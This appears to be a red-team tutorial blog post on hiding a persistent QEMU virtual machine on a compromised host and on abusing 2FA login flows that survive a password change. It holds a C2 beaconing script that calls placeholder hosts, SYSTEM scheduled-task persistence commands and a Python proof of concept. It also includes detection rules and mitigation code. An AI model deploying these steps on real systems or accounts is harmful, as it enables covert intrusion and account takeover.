
Introduction
In the evolving landscape of offensive security, red team operators must continuously adapt to bypass modern detection mechanisms while maintaining operational security (OPSEC). Two critical techniques that have gained prominence are VM-based evasion through the Shadowbunny persistence method and sophisticated 2FA abuse for maintaining access. These approaches demonstrate how adversaries think beyond traditional exploitation—focusing instead on stealth, persistence, and the subtle manipulation of authentication flows that defenders often overlook.
Learning Objectives
- Understand how to deploy VM-based persistence mechanisms for evasion and long-term access
- Master the 2FA persistence abuse technique and learn to test for this vulnerability
- Develop comprehensive detection and mitigation strategies for both attack vectors
- Gain practical command-line skills for monitoring, forensics, and hardening
You Should Know
1. Shadowbunny VM Evasion and Persistence: The Art of Invisible Access
The Shadowbunny technique represents a paradigm shift in red team operations. Instead of relying on traditional malware that leaves traces on the host filesystem, this approach deploys a lightweight virtual machine instance directly on the target host. This VM serves as a rotating, persistent foothold that evades endpoint detection and response (EDR) solutions by operating in an isolated environment that appears to be legitimate virtualization activity.
How It Works:
The adversary provisions a minimal VM image on the compromised host, configures it with stealth networking, and establishes command-and-control (C2) channels that rotate through the VM’s lifecycle. Because the VM is ephemeral and can be destroyed and recreated at will, blue teams find it difficult to detect the persistence mechanism consistently: the artifacts they key on keep disappearing.
Step-by-Step Implementation Guide:
Step 1: Prepare the VM Image
Create a minimal Linux-based VM image (Alpine Linux or similar) with only essential tools:
```bash
# On a Kali Linux machine, create a minimal VM using virt-builder
virt-builder alpine --format qcow2 --size 2G -o shadowbunny.qcow2
# Install required packages inside the VM
virt-customize -a shadowbunny.qcow2 --run-command "apk add openssh curl python3"
```
Step 2: Configure Stealth Networking
Set up the VM to use network address translation (NAT) and MAC address randomization:
```bash
# Generate a random MAC address (02: prefix marks it as locally administered)
MAC_ADDR=$(printf '02:%02x:%02x:%02x:%02x:%02x' $((RANDOM%256)) $((RANDOM%256)) $((RANDOM%256)) $((RANDOM%256)) $((RANDOM%256)))
# Configure VM with random MAC and NAT networking
virt-install --name shadowbunny --ram 512 --disk path=shadowbunny.qcow2,size=2 \
  --network network=default,mac=$MAC_ADDR --os-type linux --os-variant alpine \
  --graphics none --console pty,target_type=serial --import
```
Step 3: Implement C2 Rotation
Within the VM, set up a script that rotates C2 endpoints and re-establishes connection:
```bash
#!/bin/bash
# rotate_c2.sh - Rotate C2 endpoints every 5 minutes
C2_LIST=("https://c2-1.example.com" "https://c2-2.example.com" "https://c2-3.example.com")
while true; do
    for C2 in "${C2_LIST[@]}"; do
        curl -s --max-time 10 "$C2/beacon" || true
    done
    sleep 300
done
```
Step 4: Deploy to Target Host
Transfer the VM image and launch it using QEMU or VirtualBox command-line tools:
```bash
# On target Windows host (assuming QEMU is installed)
qemu-system-x86_64 -m 512 -drive file=shadowbunny.qcow2,format=qcow2 -netdev user,id=net0 -device e1000,netdev=net0 -nographic -daemonize
```
Step 5: Maintain Persistence
Configure the VM to auto-start on system boot via scheduled tasks (Windows) or cron (Linux):
```bash
# Windows: Create scheduled task
schtasks /create /tn "ShadowBunny" /tr "C:\path\to\qemu\qemu-system-x86_64.exe -m 512 -drive file=shadowbunny.qcow2,format=qcow2 -netdev user,id=net0 -device e1000,netdev=net0 -nographic" /sc ONSTART /ru SYSTEM
# Linux: Add to crontab
@reboot /usr/bin/qemu-system-x86_64 -m 512 -drive file=/root/shadowbunny.qcow2,format=qcow2 -netdev user,id=net0 -device e1000,netdev=net0 -nographic -daemonize
```
Detection and Mitigation:
Blue teams can detect Shadowbunny deployments by:
- Monitoring for unexpected virtualization processes (qemu, virt, vbox)
- Analyzing network traffic for unusual beaconing patterns
- Inspecting scheduled tasks and startup items for VM execution commands
- Implementing application whitelisting to block unauthorized VM execution
2. 2FA Persistence Abuse: When Authentication Becomes a Backdoor
Multi-factor authentication (2FA) is widely considered a security best practice, but Simon Ngoy’s analysis reveals a critical vulnerability in how some applications handle the 2FA login flow. When a user begins the 2FA process, some applications store a “partially logged in” state. If an attacker initiates this flow before a password change, they can complete the 2FA challenge afterward—even if the password was changed in the interim—effectively bypassing the security benefit of password rotation.
Step-by-Step Testing and Exploitation Guide:
Step 1: Initiate 2FA Flow (Attacker Browser)
Open Browser A and navigate to the target application’s login page. Enter the victim’s credentials and proceed to the 2FA challenge screen. Do not complete the 2FA yet—leave this browser tab open.
Step 2: Change Password (Victim Browser)
Open Browser B (or a private/incognito session) and log in with the victim’s current credentials. Navigate to account settings and change the password to a new value.
Step 3: Complete 2FA (Attacker Browser)
Return to Browser A (where the 2FA flow was initiated) and enter the correct 2FA code. If the application is vulnerable, you will be logged in successfully without being prompted for the new password.
Step 4: Verify Persistent Access
Once logged in, attempt to access sensitive data or perform privileged actions. The session should remain valid despite the password change.
Step 5: Automate the Exploit (Python PoC)
```python
import requests
import time
import pyotp  # Requires the pyotp library (pip install pyotp)

# Configuration
TARGET_URL = "https://target-app.example.com"
USERNAME = "[email protected]"
PASSWORD = "old_password"
NEW_PASSWORD = "new_password"
TOTP_SECRET = "your_totp_secret"  # If known, or use MITM to intercept

session_a = requests.Session()
session_b = requests.Session()

# Step 1: Initiate 2FA flow in session A
login_data = {"username": USERNAME, "password": PASSWORD}
response = session_a.post(f"{TARGET_URL}/login", data=login_data)
if "2fa_challenge" in response.text:
    print("[*] 2FA flow initiated in session A")

    # Step 2: Change password in session B
    session_b.post(f"{TARGET_URL}/login", data=login_data)
    change_data = {"new_password": NEW_PASSWORD}
    session_b.post(f"{TARGET_URL}/change_password", data=change_data)
    print("[*] Password changed in session B")

    # Step 3: Complete 2FA in session A
    totp_code = pyotp.TOTP(TOTP_SECRET).now()
    twofa_data = {"code": totp_code}
    response = session_a.post(f"{TARGET_URL}/2fa_verify", data=twofa_data)
    if "dashboard" in response.url:
        print("[!] VULNERABLE: Access granted with old password + 2FA")
        print("[+] Session A token:", session_a.cookies.get("session"))
    else:
        print("[*] Not vulnerable - 2FA flow rejected")
else:
    print("[*] 2FA not enabled or flow not triggered")
```
Mitigation Strategy:
Applications should implement a timestamp-based validation mechanism:
- When a user initiates the 2FA login process, store the timestamp of this initiation
- When a password change occurs, log the timestamp of the change
- Upon 2FA completion, reject the login if the 2FA process was started before the last password change
- Additionally, implement “log off all sessions” functionality and check this when finishing the 2FA flow
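The four-point mitigation above, written out as an added example (not code from the original post or from any particular application): the pending 2FA record stores when the flow began and which session epoch it saw, and completion is refused if the password changed, or "log off all sessions" ran, after that moment. The names Account, PendingTwoFactor and complete_two_factor, and the 5-minute challenge lifetime, are assumptions.

```python
from dataclasses import dataclass

# Times are Unix timestamps in seconds; a real app would read its clock.
PENDING_MAX_AGE_SECONDS = 300

@dataclass
class Account:
    username: str
    # When the password was last changed; a 2FA completion is honoured only if
    # the flow it belongs to started *after* this moment.
    password_changed_at: float
    # "Log off all sessions" bumps this counter; a pending flow remembers the
    # value it saw at start and is rejected once the counter has moved on.
    session_epoch: int = 0

@dataclass
class PendingTwoFactor:
    """State stored after step 1 (password accepted, OTP still outstanding)."""
    username: str
    started_at: float
    epoch_at_start: int

def start_two_factor(acct: Account, now: float) -> PendingTwoFactor:
    return PendingTwoFactor(acct.username, now, acct.session_epoch)

def change_password(acct: Account, now: float) -> None:
    acct.password_changed_at = now      # the credential update itself is elided

def log_off_all_sessions(acct: Account) -> None:
    acct.session_epoch += 1

def complete_two_factor(acct: Account, pending: PendingTwoFactor,
                        otp_valid: bool, now: float) -> bool:
    """True only if the OTP is valid AND the pending flow is still current."""
    if not otp_valid or pending.username != acct.username:
        return False
    if now - pending.started_at > PENDING_MAX_AGE_SECONDS:
        return False                    # stale challenge: make the user start over
    if pending.started_at <= acct.password_changed_at:
        return False                    # flow predates the last password change
    if pending.epoch_at_start != acct.session_epoch:
        return False                    # "log off all sessions" happened meanwhile
    return True

def replay_page_scenario() -> bool:
    """Browser A starts 2FA at t=1000, the password changes at t=1060 from
    Browser B, Browser A submits a correct OTP at t=1120: must be rejected."""
    acct = Account("victim", password_changed_at=0.0)
    pending = start_two_factor(acct, now=1000.0)
    change_password(acct, now=1060.0)
    return complete_two_factor(acct, pending, otp_valid=True, now=1120.0)
```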
3. Defensive Hardening: Monitoring and Logging Strategies
To defend against these advanced techniques, organizations must implement comprehensive monitoring:
Windows Event Log Monitoring (PowerShell):
```powershell
# Monitor for VM-related process creation
# (in event 4688, Properties[5] is NewProcessName)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} |
    Where-Object { $_.Properties[5].Value -match "qemu|vbox|virt" } |
    Select-Object TimeCreated, @{N='Process';E={$_.Properties[5].Value}}

# Monitor for scheduled task creation (Shadowbunny persistence)
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4698} |
    Select-Object TimeCreated, Message
```
Linux Syscall Monitoring (Auditd):
```bash
# Audit VM execution attempts
auditctl -a always,exit -F path=/usr/bin/qemu-system-x86_64 -F perm=x -k vm_execution
auditctl -a always,exit -F path=/usr/bin/virt-install -F perm=x -k vm_execution
# Monitor for unusual network connections (beaconing). The a0/a1 filter belongs on
# socket(), where a0 is the domain (2 = AF_INET) and a1 the type (1 = SOCK_STREAM);
# on connect() a0 is a file descriptor, so filtering connect() on a0=2 matches nothing
# useful. Note that callers passing SOCK_STREAM|SOCK_CLOEXEC will not match a1=1.
auditctl -a always,exit -F arch=b64 -S socket -F a0=2 -F a1=1 -k outbound_connection
auditctl -a always,exit -F arch=b64 -S connect -k outbound_connection
```
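An added example (not from the original post) that applies the detection ideas from the Shadowbunny section and the event IDs above to constructed sample records: process-creation (4688) and scheduled-task (4698) events are scored, and a host showing both a VM launch and a VM-wrapping task is escalated. The event field names, the ALLOWED_VM_HOSTS allow-list and the sample events are assumptions.

```python
import re
from typing import Dict, List, Optional

# Constructed sample records, not real logs: a benign 4688 process start,
# a headless QEMU launch, a scheduled task wrapping QEMU and a benign task.
SAMPLE_EVENTS: List[Dict] = [
    {"id": 4688, "host": "ws01", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"id": 4688, "host": "ws01", "image": r"C:\Tools\qemu\qemu-system-x86_64.exe",
     "cmdline": "qemu-system-x86_64.exe -m 512 -drive file=sb.qcow2 -nographic"},
    {"id": 4698, "host": "ws01", "task_content": r"C:\Tools\qemu\qemu-system-x86_64.exe -m 512 -nographic"},
    {"id": 4698, "host": "ws02", "task_content": r"C:\Tools\backup.exe --full"},
]

VM_BINARY = re.compile(r"qemu|vbox|virtualbox|virt-", re.IGNORECASE)
HEADLESS = re.compile(r"-nographic|-daemonize|--headless", re.IGNORECASE)
# Hosts where virtualization is expected (lab boxes, developer workstations);
# this allow-list is an assumption, fill it from your asset inventory.
ALLOWED_VM_HOSTS = {"devbox01"}

def classify(event: Dict) -> Optional[Dict]:
    """Return a finding for one event, or None if it is not VM-related."""
    if event["id"] == 4688:
        text = event["image"] + " " + event["cmdline"]
        reason = "vm_process_start"
    elif event["id"] == 4698:
        text = event["task_content"]
        reason = "vm_scheduled_task"        # persistence, not a one-off launch
    else:
        return None
    if not VM_BINARY.search(text):
        return None
    # Headless or auto-started VM on a host that should not run one is the
    # Shadowbunny shape; on an allowed host it is merely noteworthy.
    severity = "medium"
    if event["host"] not in ALLOWED_VM_HOSTS and (
            reason == "vm_scheduled_task" or HEADLESS.search(text)):
        severity = "high"
    return {"host": event["host"], "severity": severity, "reason": reason}

def scan(events: List[Dict]) -> List[Dict]:
    return [f for f in (classify(e) for e in events) if f]

def hosts_with_persistent_vm(events: List[Dict]) -> set:
    """Hosts showing BOTH a VM process start and a VM scheduled task."""
    found = scan(events)
    started = {f["host"] for f in found if f["reason"] == "vm_process_start"}
    tasked = {f["host"] for f in found if f["reason"] == "vm_scheduled_task"}
    return started & tasked
```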
4. Red Team Training and Certification Pathways
Building proficiency in these advanced techniques requires structured learning. Platforms like Hack The Box (HTB) and OffSec provide excellent environments for practice. The HTB Certified Penetration Testing Specialist (CPTS) certification validates practical skills in penetration testing, while OffSec’s PEN-103 course and KLCP exam cover foundational offensive security concepts.
For those serious about red team operations, the Red Team Ops (RTO) course offers deep dives into C2 frameworks, stealth operations, and adversary simulation. Mastering these skills requires hands-on practice with real-world scenarios—starting with CTF platforms, automating attacks with Python, and staying updated on Active Directory exploits and evasion techniques.
5. Malware Analysis Foundations: The Rite of Passage
As Simon Ngoy highlights in his analysis of Practical Malware Analysis, understanding malware internals is non-negotiable for serious red teamers. The book teaches you to think like malware—covering debugging, disassembly, dynamic analysis, sandboxing, API hooking, packers, and anti-debug tricks. These core principles remain the foundation of the craft, regardless of how tools and frameworks evolve.
Practical Malware Analysis Lab Setup:
```powershell
# Set up a malware analysis sandbox using FLARE VM (Windows)
# Download and install FLARE VM from GitHub
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/mandiant/flare-vm/main/install.ps1" -OutFile "install.ps1"
.\install.ps1 -password YourPassword
```
```bash
# Linux sandbox with REMnux
docker pull remnux/remnux-distro
docker run -it --rm remnux/remnux-distro
# Basic static analysis with PE tools
pestr --all suspicious.exe | grep -E "Section|Import|Export|Resources"
```
What Undercode Say:
- Key Takeaway 1: Shadowbunny VM evasion demonstrates that persistence is not just about hiding files—it’s about operating in a completely different execution context that defenders rarely monitor. Red teams should prioritize VM-based C2 over traditional agent-based approaches for high-value targets.
- Key Takeaway 2: The 2FA persistence vulnerability highlights a fundamental flaw in session management logic. Even with MFA enabled, applications must validate the temporal context of authentication flows. This is a reminder that security is only as strong as the weakest link in the authentication chain—and session state management is often that weak link.
Analysis: The convergence of VM-based evasion and authentication flow abuse represents a new frontier in red team operations. Traditional security controls are designed to detect malicious files, not malicious VMs running on compromised hosts. Similarly, password policies assume that changing credentials invalidates all existing sessions—but the 2FA flow vulnerability proves otherwise. Organizations must adopt a zero-trust mindset that validates every authentication attempt against the complete context, including timestamps and session histories. The most effective defense is a combination of behavioral analytics, application-level validation, and continuous monitoring for anomalous execution patterns.
Prediction:
- +1 The adoption of VM-based evasion techniques will drive innovation in endpoint detection, leading to next-generation EDR solutions capable of analyzing virtualization workloads for malicious activity.
- -1 As red teams increasingly abuse 2FA flows, we will see a surge in credential theft attacks that bypass MFA entirely, forcing organizations to reevaluate their authentication architectures.
- +1 The growing awareness of these techniques will accelerate the development of unified red team training programs that combine VM evasion, authentication abuse, and traditional exploitation into comprehensive adversary emulation frameworks.
- -1 Small and medium businesses that lack advanced monitoring capabilities will remain disproportionately vulnerable to these sophisticated attacks, widening the security gap between enterprise and SMB environments.
- +1 Open-source detection tools for VM-based persistence will emerge, empowering blue teams with free, accessible solutions to counter these advanced threats.
Reported By: Simon Ngoy – Hackers Feeds


